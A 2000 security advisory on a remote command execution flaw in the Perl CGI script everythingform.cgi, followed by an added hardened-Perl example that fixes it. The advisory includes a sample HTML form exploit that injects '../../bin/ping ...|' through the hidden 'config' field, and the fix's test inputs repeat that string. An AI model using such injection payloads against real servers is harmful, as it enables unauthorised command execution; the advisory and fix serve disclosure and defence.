Insecure input validation in everythingform.cgi (remote command execution)

2000-12-13T00:00:00
ID SECURITYVULNS:DOC:1067
Type securityvulns
Reporter Securityvulns
Modified 2000-12-13T00:00:00

Description

Hi All,

This is Yet Another Bad Perl Script. everythingform.cgi uses a hidden field 'config' to determine where to read configuration data from.

--code snippet--
..
$ConfigFile = $in{config};
..
open(CONFIG, "$configdir$ConfigFile") || &Error("I can\'t open $ConfigFile in the ReadConfig subroutine. Reason: $!");


Information regarding everythingform can be found at: http://www.conservatives.net/atheist/scripts/index.html?everythingform

Sample exploit:

<form action="http://www.conservatives.net/someplace/everythingform.cgi" method=POST>
<h1>everythingform.cgi exploit</h1>
Command: <input type=text name=config value="../../../../../../../../bin/ping -c 5 www.foobar.com|">
<input type=hidden name=Name value="fuck the religious right">
<input type=hidden name="e-mail" value="foo@bar.net">
<input type=hidden name=FavoriteColor value=Black>
<input type=submit value=run>
</form>

--rpc
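
Added example, not part of the original advisory or of everythingform itself: the snippet above uses Perl's two-argument open, which treats a file name ending in "|" as a command to run, so a hardened ReadConfig would validate the 'config' value and use three-argument open with an explicit read mode. The $configdir value, the ".cfg" naming rule and the function names are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed config directory; the advisory does not show the real $configdir.
my $configdir = '/var/www/cgi-data/everythingform/';

# Return the full path for a requested config name, or undef when rejected.
# Only a bare file name made of letters, digits, '_' and '-' and ending in
# ".cfg" is accepted (hypothetical naming convention). That excludes "/",
# "..", "|", spaces and newlines, so the value cannot leave $configdir or
# carry shell syntax.
sub config_path {
    my ($name) = @_;
    return undef unless defined $name;
    return undef unless $name =~ /\A([A-Za-z0-9_-]{1,64}\.cfg)\z/;
    return $configdir . $1;    # the captured $1 is also untainted under -T
}

# Open the config with three-argument open. The explicit '<' mode means the
# path is always treated as a file name, never as a command pipeline, even
# if validation were bypassed.
sub open_config {
    my ($name) = @_;
    my $path = config_path($name)
        or die "rejected config name\n";    # do not echo the raw input back
    open(my $fh, '<', $path)
        or die "cannot open config: $!\n";
    return $fh;
}

# Constructed sample inputs: one normal name, the value from the advisory's
# form, and two variants that look like valid names but are not.
my @candidates = (
    'contact.cfg',
    '../../../../../../../../bin/ping -c 5 www.foobar.com|',
    '../other.cfg',
    'contact.cfg|',
);

for my $candidate (@candidates) {
    my $path = config_path($candidate);
    printf "%-55s => %s\n", $candidate,
        defined $path ? "accepted ($path)" : 'rejected';
}
```

Running the script prints "accepted" only for contact.cfg; the other three values are rejected before any open call is made.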